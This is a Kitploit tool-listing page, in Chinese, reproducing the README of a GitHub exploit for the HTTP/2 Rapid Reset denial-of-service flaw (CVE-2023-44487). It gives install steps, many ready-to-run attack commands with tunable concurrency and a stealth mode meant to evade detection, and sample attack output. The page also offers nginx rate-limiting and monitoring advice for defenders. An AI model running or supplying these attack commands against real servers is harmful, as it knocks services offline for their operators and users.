Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-44487-HTTP2-DoS-Rapid-Reset-Exploit — 高级CVE-2023-44487 HTTP/2 Rapid Reset漏洞利用框架。具备多连接并发攻击、自适应速率控制、随机化标头的隐身模式、实时指标以及风险评估报告功能。仅限授权渗透测试使用。作者:Sudeepa Wanigarathna | Kitploit
工具/GitHubGitHub/cerberusmrxi/cve-2023-44487-http2-dos-rapid-reset-exploit
漏洞利用框架漏洞分析漏洞利用Web安全渗透测试红队对抗性攻击
GitHubcerberusmrxi/cve-2023-44487-http2-dos-rapid-reset-exploit

CVE-2023-44487-HTTP2-DoS-Rapid-Reset-Exploit

高级CVE-2023-44487 HTTP/2 Rapid Reset漏洞利用框架。具备多连接并发攻击、自适应速率控制、随机化标头的隐身模式、实时指标以及风险评估报告功能。仅限授权渗透测试使用。作者:Sudeepa Wanigarathna

查看仓库
141个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2023-44487 HTTP/2 DoS 快速重置漏洞利用

专业版 v1.0.1 | 作者:Sudeepa Wanigarathna

Python Version License Version CVSS


目录

  • 概述
  • 漏洞详情
  • 功能特性
  • 环境要求
  • 安装
  • 快速开始
  • 使用指南
  • 配置选项
  • Docker 支持
  • 示例
  • 理解结果
  • 安全建议
  • 法律免责声明
  • 作者
  • 更新日志

概述

一个针对 CVE-2023-44487(HTTP/2 快速重置漏洞)的专业级评估框架。该工具帮助安全专业人员针对近年来披露的影响最大的 HTTP/2 DoS 条件之一来测试和验证系统。

它演示了快速创建并重置 HTTP/2 数据流如何耗尽服务器资源,并导致拒绝服务(DoS)状况。

核心功能一览

  • 多连接攻击引擎 — 并发 HTTP/2 连接
  • 自适应速率控制 — 动态调整以实现最大有效性
  • 隐身模式 — 随机化标头和连接轮换
  • 综合报告 — JSON/CSV 格式并附带风险评估
  • Docker 支持 — 容器化部署
  • 实时监控 — 实时攻击指标与进度
  • 专业日志记录 — 彩色控制台输出及文件日志
UsageResults

漏洞详情

CVE-2023-44487:HTTP/2 快速重置攻击

属性值
CVE IDCVE-2023-44487
CVSS 分数7.5(高危)
攻击向量网络
攻击复杂度低
影响拒绝服务(资源耗尽)
受影响协议HTTP/2
披露日期2023 年 10 月

技术概述

该漏洞利用了 HTTP/2 协议的流管理机制:

  1. 创建流 — 客户端发送 HEADERS 帧以创建新流
  2. 立即重置 — 客户端立即发送 RST_STREAM 帧
  3. 服务器处理 — 服务器必须处理这两个帧,消耗资源
  4. 资源耗尽 — 重复循环压垮服务器资源

影响

  • HTTP/2 服务器上的资源耗尽
  • 潜在的拒绝服务(DoS)
  • 可能影响负载均衡器、代理和 CDN
  • 无需身份验证或特殊权限

功能特性

核心功能

功能描述
HTTP/2 支持使用 h2 库实现完整的 HTTP/2 协议
多连接跨多个连接并发攻击
SSL/TLS支持 HTTPS,并提供证书验证选项
自适应速率控制根据服务器响应动态调整攻击速率
隐身模式随机化标头和连接轮换
实时监控运行期间实时显示指标
综合报告JSON/CSV 输出并附带风险评估
Docker 支持容器化部署,便于测试

高级能力

  • 代理支持 — 可扩展的代理配置
  • 连接池 — 高效的连接管理
  • 错误恢复 — 优雅处理连接故障
  • 性能调优 — 针对不同场景的可配置设置
  • CI/CD 集成 — 适用于自动化安全测试

环境要求

系统要求

组件最低要求推荐配置
操作系统Linux / macOS / WindowsLinux 或 macOS
Python3.7+3.11+
CPU2 核4 核以上
内存2GB4GB 以上
网络100Mbps1Gbps 以上

依赖项

root@kitploit:~
h2>=4.1.0,<5.0.0
aiohttp>=3.8.0,<4.0.0

安装

1. 快速安装

root@kitploit:~
# Clone the repository
git clone https://github.com/CerberusMrXi/CVE-2023-44487-HTTP2-DoS-Rapid-Reset-Exploit
cd CVE-2023-44487-HTTP2-DoS-Rapid-Reset-Exploit

# Install dependencies
pip install -r requirements.txt

# Verify installation
python3 cve-2023-44487-exploit.py --help

2. 虚拟环境(推荐)

root@kitploit:~
# Create virtual environment
python3 -m venv venv

# Activate virtual environment
# On Linux/macOS:
source venv/bin/activate
# On Windows:
venv\Scripts\activate

# Install dependencies
pip install -r requirements.txt

3. Docker 安装

root@kitploit:~
# Build Docker image
docker build -t cve-2023-44487-exploit .

# Run with Docker
docker run --rm cve-2023-44487-exploit target.com

4. 手动安装

root@kitploit:~
# Install without requirements.txt
pip install "h2>=4.1.0,<5.0.0" "aiohttp>=3.8.0,<4.0.0"

# Download the exploit
wget https://raw.githubusercontent.com/CerberusMrXi/CVE-2023-44487-HTTP2-DoS-Rapid-Reset-Exploit/main/cve-2023-44487-exploit.py

# Make executable
chmod +x cve-2023-44487-exploit.py

快速开始

基本用法

root@kitploit:~
# Simple run with default settings
python3 cve-2023-44487-exploit.py example.com

# Test HTTPS on port 443
python3 cve-2023-44487-exploit.py target.com -p 443 --no-verify

# Test HTTP on port 80
python3 cve-2023-44487-exploit.py target.com -p 80 --no-ssl

快速测试(5 秒)

root@kitploit:~
python3 cve-2023-44487-exploit.py target.com -c 10 -s 100 -d 5 --no-verify

完整评估(60 秒)

root@kitploit:~
python3 cve-2023-44487-exploit.py target.com -c 100 -s 2000 -d 60 --stealth --no-verify

使用指南

命令行选项

目标配置

选项描述默认值
host目标主机名或 IP必需
-p, --port目标端口443
--no-ssl禁用 SSL/TLSFalse
--no-verify跳过 SSL 证书验证False

攻击配置

选项描述默认值
-c, --connections并发连接数50
-s, --streams每个连接的流数1000
-d, --duration持续时间(秒)30
--max-streams最大总流数100000
--delay操作之间的基础延迟0.0001s

高级选项

选项描述默认值
--adaptive自适应速率控制True
--target-rps目标每秒请求数10000
--stealth隐身模式(随机标头)False
--skip-validation跳过目标验证False
--force跳过法律免责声明提示False

报告

选项描述默认值
-o, --output输出文件名exploit_results.json
--format输出格式(json / csv / console)json
-v, --verbose详细日志记录False

配置选项

使用上述命令行标志调整并发、流数量、持续时间和报告。初始验证建议使用较低的 -c / -s / -d 值,然后仅在您有权进行压力测试的系统上扩大规模。

场景建议参数
冒烟测试-c 10 -s 100 -d 5
标准评估-c 50 -s 1000 -d 30
高负载实验室测试-c 100 -s 2000 -d 60 --stealth
不受信任的证书--no-verify
纯 HTTP-p 80 --no-ssl

Docker 支持

构建镜像

root@kitploit:~
docker build -t cve-2023-44487-exploit .

运行基本评估

root@kitploit:~
docker run --rm cve-2023-44487-exploit target.com

使用自定义参数运行

root@kitploit:~
docker run --rm cve-2023-44487-exploit target.com -c 100 -s 2000 -d 60

在本地保存结果

root@kitploit:~
docker run --rm -v "$(pwd)/results:/app/results" \
  cve-2023-44487-exploit target.com -o /app/results/report.json

交互模式

root@kitploit:~
docker run --rm -it --entrypoint /bin/bash cve-2023-44487-exploit

Docker Compose

root@kitploit:~
# Start with docker-compose
docker-compose up

# Run with a custom command
docker-compose run --rm exploit target.com -c 100 -s 2000 -d 60

示例

1. 基本 HTTPS 评估

root@kitploit:~
python3 cve-2023-44487-exploit.py api.example.com -p 443 --no-verify -c 50 -s 1000 -d 30

2. HTTP 评估(无 SSL)

root@kitploit:~
python3 cve-2023-44487-exploit.py api.example.com -p 80 --no-ssl -c 50 -s 1000 -d 30

3. 高性能实验室运行

root@kitploit:~
python3 cve-2023-44487-exploit.py target.com -c 200 -s 5000 -d 120 --target-rps 50000

4. 隐身模式

root@kitploit:~
python3 cve-2023-44487-exploit.py target.com --stealth -c 100 -s 2000 -d 60

5. 快速验证测试

root@kitploit:~
python3 cve-2023-44487-exploit.py target.com -c 10 -s 100 -d 5 --no-verify

6. 生成 CSV 报告

root@kitploit:~
python3 cve-2023-44487-exploit.py target.com --format csv -o report.csv

7. 跳过验证

root@kitploit:~
python3 cve-2023-44487-exploit.py target.com --skip-validation -c 50 -s 1000 -d 30

8. 经授权的生产环境测试

root@kitploit:~
python3 cve-2023-44487-exploit.py production.com -p 443 --no-verify \
  -c 100 -s 2000 -d 60 --stealth -o full_report.json

理解结果

输出指标

指标描述解读
总流数创建的流数量数量越高 = 产生越多负载
成功重置数成功重置的流在易受攻击的目标上通常 >90%
重置速率(RPS)每秒重置次数速率越高 = 负载越有效
成功率成功重置的百分比>90% 通常表明存在暴露风险
连接错误失败的连接低 = 连接稳定
服务器重置服务器发起的重置高 = 存在防护措施

风险评估等级

等级分数含义
严重(CRITICAL)80–100服务器高度易受攻击
高危(HIGH)60–79服务器易受攻击,存在部分防护
中危(MEDIUM)40–59已有部分防护
低危(LOW)0–39服务器防护良好

示例输出

root@kitploit:~
================================================================================
EXPLOIT EXECUTION SUMMARY
================================================================================
Target: target.com:443
Duration: 30.00s
Total Streams: 15,234
Successful Resets: 15,198
Reset Rate: 506.6/s
Success Rate: 99.76%
Connection Errors: 0
--------------------------------------------------------------------------------
RISK ASSESSMENT
--------------------------------------------------------------------------------
Risk Level: CRITICAL
Risk Score: 95/100
Factors:
  - Extremely high reset rate accepted
  - Very high success rate
================================================================================

安全建议

面向系统管理员

立即执行的操作

  1. 应用安全补丁

    • 更新到最新的 HTTP/2 实现
    • 应用供应商特定的安全补丁
    • 更新负载均衡器和代理
  2. 实施速率限制

    root@kitploit:~
    # Nginx rate limiting example
    http {
        limit_req_zone $binary_remote_addr zone=http2:10m rate=10r/s;
        limit_req zone=http2 burst=20 nodelay;
    }
    
  3. 连接限制

    root@kitploit:~
    # Limit connections per client
    limit_conn_zone $binary_remote_addr zone=conn_zone:10m;
    limit_conn conn_zone 10;
    

配置加固

设置建议
最大并发流数每个连接设置为 100–200
流重置速率每个客户端限制为 <100 次/秒
连接限制每个 IP 最多 50–100 个连接
超时值减少空闲超时
请求大小限制限制标头大小和负载

监控

root@kitploit:~
# Monitor HTTP/2 connections
netstat -an | grep 443 | grep ESTABLISHED | wc -l

# Monitor reset-related log entries (example)
grep "RST_STREAM" /var/log/nginx/error.log | wc -l

推荐的安全控制措施

  • 速率限制 — 实施每客户端流限制
  • 连接限流 — 限制每个 IP 的连接数
  • 资源限制 — 设置连接超时值
  • 监控 — 启用日志记录和异常告警
  • WAF 规则 — 实施针对 HTTP/2 的 WAF 规则
  • 补丁管理 — 定期安全更新
  • 事件响应 — 针对 DoS 攻击制定预案

法律免责声明

重要提示:使用本工具前请仔细阅读

本工具仅用于经授权的安全测试和教育目的。

使用条款

使用本工具即表示您确认并同意:

  1. 您已获得明确的书面许可来测试目标系统
  2. 您了解本次评估的风险和潜在影响
  3. 您将遵守所有适用的法律法规
  4. 您对自己的行为承担全部责任
  5. 您不会将本工具用于未经授权的活动

禁止用途

本工具严禁用于:

  • 未经授权的测试或攻击
  • 对您不拥有或未经许可测试的系统实施拒绝服务
  • 未经授权干扰生产系统
  • 造成经济损失
  • 任何非法活动

责任声明

作者和贡献者按“原样”提供本工具,不附带任何担保。使用本工具的风险由您自行承担。作者不对因使用本工具而产生的任何损害或法律问题负责。

未经授权使用本工具可能违反包括但不限于以下法律:

  • 美国《计算机欺诈与滥用法》(CFAA)
  • 英国《计算机滥用法》
  • 欧盟《通用数据保护条例》(GDPR)
  • 其他相关的地方、国家和国际法律

作者

Sudeepa Wanigarathna

  • 安全研究员与渗透测试人员
  • 专注于应用安全与协议漏洞
  • GitHub
  • LinkedIn

更新日志

版本 1.0.1(当前)

  • 修复了 connection_attempts 属性错误
  • 改进了 SSL/ALPN 验证
  • 增加了超时处理
  • 增强了错误恢复
  • 新增 --skip-validation 标志
  • 改进了 Docker 支持

版本 1.0.0(初始版本)

  • 专业版首次发布
  • 多连接攻击引擎
  • 自适应速率控制
  • 隐身模式
  • 综合报告
  • Docker 支持

许可证

本项目采用 MIT 许可证授权 — 详情请参阅 LICENSE 文件。


致谢

  • HTTP/2 协议团队
  • 发现 CVE-2023-44487 的安全研究人员
  • 开源社区(h2、aiohttp 项目)

参考资料

  • CVE-2023-44487 NVD 条目
  • HTTP/2 快速重置攻击分析
  • HTTP/2 协议规范(RFC 9113)
  • Nginx HTTP/2 安全公告
  • Apache HTTP/2 安全指南

支持

如有问题或疑问:

  • GitHub Issues:提交问题
  • 电子邮件:[email protected]
  • 安全联系:如果您在本项目中发现漏洞,请负责任地报告。

快速参考卡

root@kitploit:~
# Quick Commands

# Test HTTPS (skip cert verify)
python3 cve-2023-44487-exploit.py target.com --no-verify

# Test HTTP
python3 cve-2023-44487-exploit.py target.com -p 80 --no-ssl

# Quick test (5 seconds)
python3 cve-2023-44487-exploit.py target.com -c 10 -s 100 -d 5

# Full assessment
python3 cve-2023-44487-exploit.py target.com -c 100 -s 2000 -d 60 --stealth

# Skip validation
python3 cve-2023-44487-exploit.py target.com --skip-validation

# Docker
docker run --rm cve-2023-44487-exploit target.com

# Help
python3 cve-2023-44487-exploit.py --help

提醒: 测试任何系统前,请始终获得适当授权。请负责任且合乎道德地使用本工具。


由 Sudeepa Wanigarathna 维护 | 最后更新:2026 年 8 月

下载工具